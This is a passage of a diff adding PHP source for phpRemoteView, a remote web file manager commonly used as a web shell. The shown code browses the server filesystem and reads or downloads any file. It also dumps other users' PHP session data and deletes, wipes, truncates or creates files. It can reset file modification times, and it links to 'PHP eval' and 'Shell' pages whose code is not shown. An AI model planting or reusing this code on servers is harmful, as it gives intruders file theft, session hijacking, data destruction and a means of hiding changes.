+<b>".mm("Reason").":</b></td></tr></table>
+</td></tr><tr><td>
+<table bgcolor=#ffcccc width=100% border=0 cellspacing=0 cellpadding=3><tr><td>
+$obb<P>
+</td></tr></table>
+</table><P>";
+      $GLOBALS['obb_flag']=0;
+   }
+}
+
+function sizeparse($size) {
+   return strrev(preg_replace("!...!","\\0 ",strrev($size)));
+}
+
+
+function jsval($msg) {
+   $msg=str_replace("\\","\\\\",$msg);
+   $msg=str_replace("\"","\\\"",$msg);
+   $msg=str_replace("'","\\'",$msg);
+   return '"'.$msg.'",';
+}
+
+
+
+///////////////////////////////////////////////////////////////////////////
+
+
+switch($c) {
+
+
+// listing
+case "l":
+
+   echo $GLOBALS['html'];
+
+   if (!realpath($d)) die("".mm("Error path").". <a href=$self>".mm("Click here for start")."</a>.");
+
+   //up($d);
+   
+   ob();
+   $di=dir($d);
+   obb();
+
+   $dirs=array();
+   $files=array();
+
+   if (!$di) exit("<a href=$self?&c=l&d=".urlencode(realpath($d."..")).
+      "><nobr>&lt;&lt;&lt; <b>".mm("up directory")."</b> &gt;&gt;&gt;</nobr></a> <p>".
+      "<font color=red><b>".mm("access denied")."</b></font>: $obb");
+   while (false!==($name=$di->read())) {
+      if ($name=="." || $name=="..") continue;
+      if (@is_dir($d.$name)) { 
+         $dirs[]=strval($name);
+         $fstatus[$name]=0;
+      }
+      else {
+         $files[]=strval($name);
+         $fstatus[$name]=1;
+      }
+      $fsize[$name]=@filesize($d.$name);
+      $ftype[$name]=@filetype($d.$name);
+      if (!is_int($fsize[$name])) { $ftype[$name]='?'; $fstatus[$name]=1; }
+      $fperms[$name]=@fileperms($d.$name);
+      $fmtime[$name]=@filemtime($d.$name);
+      $fatime[$name]=@fileatime($d.$name);
+      $fctime[$name]=@filectime($d.$name);
+      $fowner[$name]=@fileowner($d.$name);
+      $fgroup[$name]=@filegroup($d.$name);
+      if (preg_match("!^[^.].*\.([^.]+)$!",$name,$ok)) 
+         $fext[$name]=strtolower($ok[1]); 
+      else 
+         $fext[$name]="";
+   }
+   $di->close();
+
+   $listsort=array();
+   if (count($dirs))
+   foreach ($dirs as $v) {
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "t": case "s": case "n": $listsort[$v]=strtolower($v); break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+   $names=$listsort;
+   //echo "<pre>";print_r($names);
+   if ($cc[1]) arsort($names); else asort($names);
+   //echo "<pre>";print_r($names);
+
+   $listsort=array();
+   if (count($files))
+   foreach ($files as $v) {
+       $v=strval($v);
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "n": $listsort[$v]=strtolower($v); break;
+                case "t": $listsort[$v]=$ftype[$v]; break;
+                case "s": $listsort[$v]=$fsize[$v]; break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+
+   //echo "<pre>DIRS:"; print_r($names);
+   if ($cc[1]) arsort($listsort); else asort($listsort);
+   //$names=array_merge($names,$listsort);
+   foreach ($listsort as $k=>$v) $names[$k]=$v;
+   //echo "<pre>FILES:"; print_r($listsort);
+   //echo "<pre>NAMES:"; print_r($names);
+
+?>
+<STYLE>
+.title {
+color: 'black';
+background: #D4D0C8;
+text-align: 'center';
+BORDER-RIGHT:   #888888 1px outset;
+BORDER-TOP:     #ffffff 2px outset;
+BORDER-LEFT:    #ffffff 1px outset;
+BORDER-BOTTOM:  #888888 1px outset;
+}
+.window {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+BACKGROUND-COLOR: #D4D0C8;
+CURSOR: default;
+}
+.window1 {
+BORDER-RIGHT:  #eeeeee 1px solid;
+BORDER-TOP:    #808080 1px solid;
+BORDER-LEFT:   #808080 1px solid;
+BORDER-BOTTOM: #eeeeee 1px solid;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+}
+.line {
+BORDER-RIGHT:   #cccccc 1px solid;
+BORDER-TOP:     #ffffff 1px solid;
+BORDER-LEFT:    #ffffff 1px solid;
+BORDER-BOTTOM:  #cccccc 1px solid;
+font: <?php echo $cp[4]; ?>pt <?php echo $cp[3]; ?>;
+}
+.line2 {
+background: #ffffcc;
+}
+.black {color: black}
+a:link.black {color: black}
+a:active.black {color: black}
+a:visited.black {color: black}
+a:hover.black {color: #0000ff}
+
+.white {color: white}
+a:link.white{color: white}
+a:active.white{color: white}
+a:visited.white{color: white}
+a:hover.white{color: #ffff77}
+
+a:link     {color: #000099;}
+a:active   {color: #000099;}
+a:visited  {color: #990099;}
+a:hover    {color: #ff0000;}
+a {
+CURSOR: default;
+}
+.windowtitle {
+font: 9pt; Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+font-weight: bold;
+color: white;
+}
+.sym {
+font: 14px Wingdings;
+}
+</STYLE>
+
+<?php
+
+function up2($d) {
+   global $win,$self;
+   $d=str_replace("\\","/",$d);
+   if (substr($d,-1)!="/") $d.="/";
+   $d=str_replace("//","/",$d);
+
+   $n=explode("/",$d);
+   unset($n[count($n)-1]);
+
+   $path="";
+   for ($i=0; $i<count($n); $i++) {
+      $path="$path$n[$i]/";
+      if ($i==0) $path=strtoupper($path);
+      $paths[]=$path;
+   }
+
+   $out="";
+   $sum=0;
+   $gr=70;
+   for ($i=0; $i<count($n); $i++) {
+      $out.="<a href=$self?c=l&d=".urlencode($paths[$i])." class=white>";
+      if (strlen($d)>$gr && $i>0 && $i+1<count($n)) {
+         if (strlen($d)-$sum>$gr) {
+            $out.="••";
+            $sum+=strlen($n[$i]);
+         }
+         else 
+            $out.=$n[$i];
+      }
+      else 
+         if ($i==0) $out.=strtoupper($n[$i]); else $out.=$n[$i];
+      $out.="/</a>";
+
+   }
+
+   return $out;
+   return "<font size=-2>$d</font>";
+}
+
+$ext=array();
+$ext['html']=array('html','htm','shtml');
+$ext['txt']=array('txt','ini','conf','','bat','sh','tcl','js','bak','doc','log','sfc','c','cpp','h','cfg');
+$ext['exe']=array('exe','com','pif','src','lnk');
+$ext['php']=array('php','phtml','php3','php4','inc');
+$ext['img']=array('gif','png','jpeg','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg');
+
+
+   echo "\n\n\n<script>\nfunction tr(";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "a$i,";
+   }
+   echo "x) {\ndocument.write(\"<tr bgcolor=#eeeeee";
+//   echo " onMouseOver='this.style.value=\\\"line2\\\"' onMouseOut='this.style.value=\\\"line\\\"'>";
+   echo " onMouseOver='this.style.backgroundColor=\\\"#FFFFCC\\\"' onMouseOut='this.style.backgroundColor=\\\"\\\"'>";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo '<td align='.$cn_align[$cn[$i]].' class=line ';
+      switch ($cn[$i])  {
+         case 's': case 'c':  case '1':  case '2':  case '3': case 't':
+            echo ' nowrap'; 
+      }
+      echo ">";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "\"+a$i+\"";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "</td>";
+   }
+   echo "</tr>\");\n}";
+   echo "\n\n</script>\n\n\n";
+
+
+   //phpinfo();
+   //echo implode(" | ",$cp);
+   echo '<table border=0 cellspacing=2 cellpadding=0 bgcolor=#cccccc 
+      class=window align=center width=60%><form name=main>';
+
+   echo '<tr><td colspan='.strlen($cn).' bgcolor=#0A246A background="'.
+   $self.'?c=img&name=fon&r=" class=windowtitle>';
+
+         echo '<table width=100% border=0 cellspacing=0 cellpadding=2 class=windowtitle><tr><td>'.
+         '<a href='.$self.'><img src='.$self.'?c=img&name=dir border=0></a>'.
+         up2($d.$f).'</td></tr></table>';
+
+   echo '</td></tr>'.
+   '<tr><td>'.
+   '<table width=100% border=0 cellspacing=0 cellpadding=0 class=window1><tr>';
+
+   $button_help=array(
+   'up'=>"UP DIR",
+   'refresh'=>"RELOAD",
+   'mode'=>'SETUP, folder option',
+   'edit'=>'DIR INFO',
+   'home'=>'HomePage',
+   'papki'=>'TREE',
+   'setup'=>'PHP eval, Shell',
+   'back'=>'BACK',
+   );
+
+   function button_url($name) {
+      global $self,$d,$f,$uurl;
+      switch ($name) {
+         case 'up': return "$self?c=l&d=".urlencode(realpath($d.".."));
+         case 'refresh': return "$self?c=l&r=".rand(0,10000)."&d=".urlencode($d);
+         case 'mode': return "$self?c=setup&ref=$uurl";
+         case 'edit': return "$self?c=d&d=".urlencode($d);
+         case 'home': return "http://php.spb.ru/remview/";
+         case 'papki': return "$self?c=tree&d=".urlencode($d);
+         case 'setup': return "$self?c=t";
+         case 'back': return "javascript:history.back(-1)";
+      }
+   }
+   echo '<td colspan='.strlen($cn).'>
+   <table border=0 cellspacing=0 cellpadding=2><tr>';
+   $buttons=array('back','up','refresh','edit','mode','disk','full','papki','setup','home');
+   $tmp=strtoupper($d[0]);
+   for ($i=0; $i<count($buttons); $i++) {
+      if ($buttons[$i]=='full') {
+         echo '<td class=window width=90% align=center nowrap><font color=#999999 face="Arial Black" 
+         style="font-size: 11pt;">&lt;?php<u>R</u>emote<u>V</u>iew?&gt;</font></td>';
+         continue;
+      }
+      if ($buttons[$i]=='disk') {
+         if (!$win) continue;
+         echo '<td width=1% title=\'Select dist\' class=window onMouseOver="this.style.backgroundColor=\'#eeee88\'" '.
+              ' onMouseOut="this.style.backgroundColor=\'\'">';
+         echo "<select name=disk size=1; style='font: 9pt Arial Black; color: #999999 '
+         onChange='location.href=\"$self?c=l&d=\"+document.main.disk.options[document.main.disk.selectedIndex].value+\":/\"'>";
+         for ($j=ord('A'); $j<=ord('Z'); $j++) 
+            echo '<option value="'.chr($j).'"'.(chr($j)==$tmp?" selected":"").'>'.chr($j);
+         echo "</select></td>";
+         continue;
+      }
+      $bturl=button_url($buttons[$i]);
+      echo '<td width=1% title=\''.$button_help[$buttons[$i]].'\' class=window'.
+           ' onMouseMove="this.style.backgroundColor=\'#eeee88\';window.status=\'** '.$button_help[$buttons[$i]].' ** '.$bturl.'\'"'.
+           ' onMouseOut="this.style.backgroundColor=\'\';window.status=\'\'"'.
+           ' onClick=\'location.href="'.$bturl.'"\'><a href=';
+      echo button_url($buttons[$i]);
+      echo '><img HSPACE=3 border=0 src='.$self.'?c=img&name='.$buttons[$i].'></a></td>';
+   }
+   echo '</tr></table>
+   </td></tr><tr>';
+
+
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "<td nowrap class=title onClick='location.href=\"".
+           "$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl\"'";
+      switch ($cn[$i]) {
+         case 1: case 2: case 3: case "s": echo " width=13%"; break;
+         case 't': echo " width=2%"; break;
+         case 'n': echo " width=40%"; break;
+      }
+      echo "><a href='$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl' class=black>";
+      switch ($cn[$i]) {
+         case "n": case "t": case "s": case "o": case "g": 
+         case "a": case "c": case "1": case "2": case "3": 
+            echo "\xA0".$cn_name[$cn[$i]]."\xA0"; break;
+         default: 
+            echo "??$cn[$i]??";
+      }
+      if ($cc[0]==="$i") {
+         if ($cc[1]=='0') echo "<img src=$self?c=img&name=sort_asc border=0>";
+         else echo "<img src=$self?c=img&name=sort_desc border=0>";
+      }
+      echo '</a></td>';
+   }
+   echo '</tr>';
+   
+   echo "\n\n<script>\n\n";
+   foreach ($names as $k=>$v) {
+
+      echo "\n\n// $k \n";
+      echo 'tr(';
+      
+      for ($i=0; $i<strlen($cn); $i++) {
+
+         switch ($cn[$i]) {
+         
+            case 'n': 
+               switch($ftype[$k]) {
+               case 'file':
+                  $vv=strtolower(substr($k,strlen($k)-4,4));
+                  $add="";
+                  if ($vv==".gif" || $vv==".jpg" || $vv==".png" || $vv==".bmp"
+                     || $vv==".ico" || $vv=="jpeg") $add="&ftype=2&fnot=1";
+                  if (substr($k,0,5)=="sess_") $add="&ftype=4";
+                  $ln='<a href='.$self.'?&c=v&d='.urlencode($d).
+                  '&f='.urlencode($k).$add.'>';
+                  break;
+
+               default:
+                  $ln='<a href='.$self.'?&c=l&d='.urlencode($d.$k).'>';
+                  break;
+               }
+               
+               if ($ftype[$k]=='dir') 
+                  $ln.='<img src='.$self.'?c=img&name=dir border=0>';
+               else {
+                  $found=0;
+                  foreach ($ext as $kk=>$vv) {
+                     if (in_array(strtolower($fext[$k]),$vv)) {
+                        $ln.='<img src='.$self.'?c=img&name='.$kk.' border=0>';
+                        $found=1;
+                        break;
+                     }
+                  }
+                  if (!$found)
+                     $ln.='<img src='.$self.'?c=img&name=unk border=0>';
+               }
+               $ln.=substr($k,0,48).'</a>';
+               echo jsval($ln);
+
+               break; 
+
+            case "t": 
+               switch ($ftype[$k]) {
+               case "dir":
+                  echo jsval("<a href=$self?c=d&d=".urlencode($d.$k).">DIR</a>"); 
+                  break;
+               case "file":
+                  echo jsval("<a href=$self/".urlencode($k)."?&c=v&fnot=1&ftype=3&d=".
+                     urlencode($d)."&f=".urlencode($k)." class=sym>\xF2</a> ".
+                     "<a href=$self?&c=i&d=".urlencode($d)."&f=".urlencode($k)." class=sym>\xF0</a>");
+                  break;
+               case "link":
+                  echo jsval("<font class=t>&#8212;&gt;</font>");
+                  break;
+               default:
+                  echo jsval("??");
+                  break;
+               }
+               break;
+            
+            case "s": 
+               if ($ftype[$k]=='file') echo jsval(sizeparse($fsize[$k])); 
+               else echo jsval(''); 
+               break;
+            
+            case "o": 
+               $tmp=@_posix_getpwuid($fowner[$k]);
+               if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k];
+               else $tow=$tmp['name'];
+               echo jsval($tow);
+               break;
+            
+            case "g": 
+               $tmp2=@_posix_getgrgid($fgroup[$k]);
+               if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k];
+               else $tgr=$tmp2['name'];
+               echo jsval($tgr);
+               break;
+            
+            case "a": 
+               $tmp=@_posix_getpwuid($fowner[$k]);
+               if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k];
+               else $tow=$tmp['name'];
+               $tmp2=@_posix_getgrgid($fgroup[$k]);
+               if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k];
+               else $tgr=$tmp2['name'];
+               echo jsval("$tow/$tgr");
+               break;
+
+            case "c": 
+               echo jsval(display_perms($fperms[$k])); break;
+            
+            case "1": echo jsval(date($cp[2],$fctime[$k])); break;
+            
+            case "2": echo jsval(date($cp[2],$fmtime[$k])); break;
+            
+            case "3": echo jsval(date($cp[2],$fatime[$k])); break;
+
+            default: echo "??$cn[$i]??";
+
+         } //switch ($ftype)
+      
+      }//for ($cn)
+      
+      echo "0);\n";
+
+   }//foreach ($names)
+   
+   echo "\n\n</script>\n\n\n";
+   
+   echo '</td></tr></table></td></tr></table></td></tr></table>';
+
+
+   echo "<P align=center>
+   <font size=1 style='Font: 8pt Verdana'><B>
+   <a href=$self?c=setup&ref=$uurl>".mm("Setup")."</a> | 
+   <a href=$self?c=t>PHP eval</a> | 
+   <a href=$self?c=phpinfo>phpinfo()</a> | 
+   <a href=$self?c=t>Shell</a> | 
+   <a href=$self?c=codes>".mm("Char map")."</a> |
+   ".mm("Language").": 
+   <a href=$self?c=set&c2=eng&ref=$uurl&pan=0>".mm("English")."</a>/<a href=$self?c=set&c2=rus&ref=$uurl&pan=0>".mm("Russian")."</a>
+   
+   </b>
+   <hr size=1 noshade width=55%><center>
+
+   <table border=0 cellspacing=0 cellpadding=0><tr><td width=32>
+   <font face=webdings style='Font-size: 22pt;'>&#0033;</font></td><td>
+   <font size=1 style='Font: 8pt Verdana'>phpRemoteView &copy; Dmitry Borodin (".mm("version")." $version)<br>
+   ".mm("Free download")." - <a href='http://php.spb.ru/remview/'>http://php.spb.ru/remview/</a></b></font></td>
+   </tr></table>";
+
+break;
+
+
+case "set": 
+
+   switch ($c2) {
+      case "sort":
+         $name=intval($name);
+         if ($name==$cc[0]) if ($cc[1]==='0') $cc[1]='1'; else $cc[1]='0';
+         $cc[0]=$name;
+         break;
+
+      case "panel":
+         $cn='';
+         foreach ($names as $k=>$v) {
+            if ($v!="") $cn.=substr($v,0,1);
+         }
+         $cc[0]=substr($sort,0,1);
+         $cc[1]=substr($sortby,0,1);
+         $cp[2]=substr($datetime,0,50);
+         $cp[3]=substr($fontname,0,50);
+         $cp[4]=substr($fontsize,0,50);
+
+         //exit("cn=$cn<br>cc=$cc");
+         break;
+
+      case "eng":
+         $cc[5]=1;
+         break;
+
+      case "rus":
+         $cc[5]=2;
+         break;
+
+   }
+
+
+   $cookie=$cc."~".$cn."~".$cp[2]."~".$cp[3]."~".$cp[4];
+   if ($c2=="reset") $cookie=implode("~",$cp_def);
+   //echo "<script>alert('$cookie')</script>";
+   setcookie("cp$pan",$cookie,time()+24*60*60*333,'/');
+   header("Location: $ref");
+   echo "<script>location.href=\"$ref\";</script>";
+   //echo "[$ref]";
+   //phpinfo();
+   break;
+
+
+case "setup": 
+
+   echo $GLOBALS['html'];
+
+   echo "<center><h3><b>phpRemoteView ".mm("setup")."</b> [<A href='javascript:history.go(-1)'>".mm("back")."</a>]</h3></center><hr size=1 noshade>";
+
+   echo "<STYLE>
+   .setup {
+      font-size: 8pt;
+      font-family: Tahoma;
+   }
+   HTML, TD {font: 90%}
+   </STYLE>";
+
+   echo "
+   <b><u>".mm("Reset all settings")."</u></b>: <a href=$self?c=set&c2=reset&pan=$panel&ref=$ref>".mm("clear")."</a>";
+   echo " <font color=white>(".mm("Current").": <small>".implode(" | ",$cp)."</small>)</font><P>";
+
+   echo "
+   <form action=$self method=post>
+   <input type=hidden name=c value=\"set\">
+   <input type=hidden name=c2 value=\"panel\">
+   <input type=hidden name=pan value=\"$panel\">
+   <input type=hidden name=ref value=\"$ref\">
+   ";
+   echo "<b><u>".mm("Colums and sort")."</u></b><br>";
+
+   echo "".mm("Sort order").": ";
+   echo "<input type=radio name=sortby value=0 id=q3 ".($cc[1]=='0'?"checked":"").">";
+   echo "<label for=q3>".mm("Ascending sort")."</label>";
+   echo "<input type=radio name=sortby value=1 id=q4 ".($cc[1]=='1'?"checked":"").">";
+   echo "<label for=q4>".mm("Descending sort")."</label><br>";
+
+   echo "<input type=radio name=sort value='n' id=q1 ".($cc[0]=='n'?"checked":"").">";
+   echo "<label for=q1>".mm("Sort by filename")."</label>";
+   echo "<input type=radio name=sort value='e' id=q2 ".($cc[0]=='e'?"checked":"").">";
+   echo "<label for=q2>".mm("Sort by filename extension")."</label>";
+   echo "<table border=0 cellspacing=0 cellpadding=3>";
+   for ($i=0; $i<2; $i++) {
+      echo "<tr>";
+      for ($j=0; $j<7; $j++) {
+         $n=$j+$i*7;
+         echo "<td align=center><label for=$n>Sort by ".($n+1)."</label>";
+         echo "<input type=radio name=sort value=$n id=$n ".($cc[0]=="$n"?"checked":"").">";
+         echo "<br><select class=setup name=names[] size=".(count($cn_name)+1).">";
+         echo "<option value=''>--hidden--";
+         foreach ($cn_name as $kk=>$vv) 
+            echo "<option value='$kk'".($n<strlen($cn) && $cn[$n]==$kk?" selected":"").">$vv";
+         echo "</select>";
+      }
+      echo "</tr>";
+   }
+   echo "</table><P>";
+
+   echo "<b><u>".mm("Date/time format")."</u></b>: <input type=text name=datetime value=\"$cp[2]\"><br>
+   d - day, m - month, y - year2, Y - year4, H - hour, m - minute, s - second<P>";
+
+   echo "<b><u>".mm("Panel font & size")."</u></b>: 
+   <input type=text name=fontname value=\"$cp[3]\" size=12> 
+   <input type=text name=fontsize value=\"$cp[4]\" size=2>pt<P>";
+
+   echo "<P><center><input type=submit value='&nbsp; &nbsp; S &nbsp; U &nbsp; B &nbsp; M &nbsp; I &nbsp; T &nbsp; &nbsp;'></center></form>";
+
+   
+   echo "<hr size=1 noshade>";
+   break;
+
+
+
+// view
+case "v":
+
+
+   if (!isset($fnot)) $fnot=0;
+   if (!isset($ftype)) $ftype=0;
+   
+   if ($fnot==0) {
+      echo $GLOBALS['html'];
+      up($d,$f);
+      echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+      up_link($d,$f);
+      echo "<hr size=1 noshade>";
+   }      
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"rb")) exit("<p><font color=red><b>".mm("access denied")."</b></font>");
+
+   if ($ftype==0 || $ftype==4) {
+      $buf=fread($fi,max(filesize($d.$f),$maxsize_fread));
+      fclose($fi);
+   }
+
+
+   switch ($ftype) {
+
+   case 0: 
+      echo "<pre>".htmlspecialchars($buf)."</pre>";
+      break;
+
+   case 1: 
+      readfile($d.$f); 
+      break;
+
+   case 2: 
+      header("Content-type: image/gif"); 
+      readfile($d.$f); 
+      break;
+
+   case 3: // download
+
+      if (isset($fatt) && strlen($fatt)>0) {
+          $attach=$fatt; 
+          header("Content-type: text/plain"); 
+      } 
+      else {
+          $attach=$f;
+          header("Content-type: phpspbru"); 
+      }
+      header("Content-disposition: attachment; filename=\"$attach\";"); 
+      readfile($d.$f); 
+      break;
+
+   case 4: // session
+   
+      echo "<xmp>";
+      if (substr($f,0,5)=="sess_" && preg_match("!^sess_([a-z0-9]{32})$!i",$f,$ok)) {
+         ini_set("session.save_path",$d);
+         session_id($ok[1]);
+         session_start();
+         print_r($HTTP_SESSION_VARS);
+      }
+      else {
+         print_r(unserialize($buf));
+      }
+      echo "</xmp>";//<hr size=1 noshade><xmp>";
+      break;
+
+   }
+
+   break;
+
+
+
+
+
+
+
+case "i": // information for FILE
+
+   echo $GLOBALS['html'];
+   up($d,$f);
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   up_link($d,$f);
+
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit(mm("file not found"));
+
+   echo "<P><big><b><tt>".htmlspecialchars($d.$f)."</tt></b></big><P>";
+   echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+   echo "<tr class=tr><td>".mm("Size")."        </td><td> ".filesize($d.$f)."</td></tR>";
+   echo "<tr class=tr><td>".mm("Owner")."/".mm("Group")." </td><td> ";      
+   $tmp=@_posix_getpwuid(fileowner($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+   else echo $tmp['name']." ";
+   $tmp=@_posix_getgrgid(filegroup($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+   else echo $tmp['name'];
+   echo "<tr class=tr><td>".mm("FileType")."    </td><td> ".filetype($d.$f)."</td></tr>";
+   echo "<tr class=tr><td>".mm("Perms")."       </td><td> ".display_perms(fileperms($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("Create time")." </td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("Access time")." </td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("MODIFY time")." </td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+   echo "</table><P>";
+
+   $fi=@fopen($d.$f,"rb");
+   if ($fi) {
+      $str=fread($fi,$hexdump_lines*$hexdump_rows);
+      echo "<b>".mm("HEXDUMP PREVIEW")."</b>";
+      $n=0;
+      $a0="00000000<br>";
+      $a1="";
+      $a2="";
+      for ($i=0; $i<strlen($str); $i++) {
+         $a1.=sprintf("%02X",ord($str[$i])).' ';
+         switch (ord($str[$i])) {
+            case 0:  $a2.="<font class=s2>0</font>"; break;
+            case 32: 
+            case 10:
+            case 13: $a2.="&nbsp;"; break;
+            default:  $a2.=htmlspecialchars($str[$i]);
+         }
+         $n++;
+         if ($n==$hexdump_rows) {
+            $n=0;
+            if ($i+1<strlen($str)) $a0.=sprintf("%08X",$i+1)."<br>";
+            $a1.="<br>";
+            $a2.="<br>";
+         }
+      }
+      //if ($a1!="") $a0.=sprintf("%08X",$i)."<br>";
+      echo "<table border=0 bgcolor=#cccccc cellspacing=1 cellpadding=4 ".
+         "class=sy><tr><td bgcolor=#e0e0e0>$a0</td><td bgcolor=white>".
+         "$a1</td><td bgcolor=white>$a2</td></tr></table><p>";
+   }
+   
+   echo "<b>Base64: </b>
+   <nobr>[<a href=$self?c=base64&c2=0&d=".urlencode($d)."&f=".urlencode($f).">Encode</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=1&d=".urlencode($d)."&f=".urlencode($f).">+chunk</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=2&d=".urlencode($d)."&f=".urlencode($f).">+chunk+quotes</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=3&d=".urlencode($d)."&f=".urlencode($f).">Decode</a>]&nbsp;</nobr>
+   <P>";
+
+
+   if (!$write_access) exitw();
+
+   $msg="";
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS")."</b></font>)";
+   else fclose($fi);
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied")."</b></font>)";
+   else fclose($fi);
+   if ($msg=="") $msg=" (".mm("full read/write access").")";
+
+   echo "<b>".mm("FILE SYSTEM COMMANDS")."$msg</b><p>";
+
+   echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td bgcolor=#cccccc><a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f).
+"><b>&nbsp;&nbsp;".mm("EDIT")."&nbsp;&nbsp;<br>&nbsp;&nbsp;".mm("FILE")."&nbsp;&nbsp;</b></a></td>
+<td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=delete>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("DELETE")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Delete this file")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=clean>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("CLEAN")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("filesize to 0byte")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=touch>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("TOUCH")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("Set current 'mtime'")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=wipe>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("WIPE(delete)")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Write '0000..' and delete")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+</tr></table>
+";
+
+   echo "<form action=$self method=post><input type=hidden name=c value=copy>".
+        "<b>".mm("COPY FILE")."</b> ".mm("from")." <input type=text size=40 name=from value=\"".htmlspecialchars($d.$f)."\">".
+        " ".mm("to")." <input type=text name=to size=40 value=\"".htmlspecialchars($d.$f)."\">".
+        "<nobr><input type=submit value='".mm("COPY")."!'>".
+        "&gt;<input type=checkbox name=confirm value=copy></nobr></form>";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (".mm("type full path").")
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d.$f)."\">
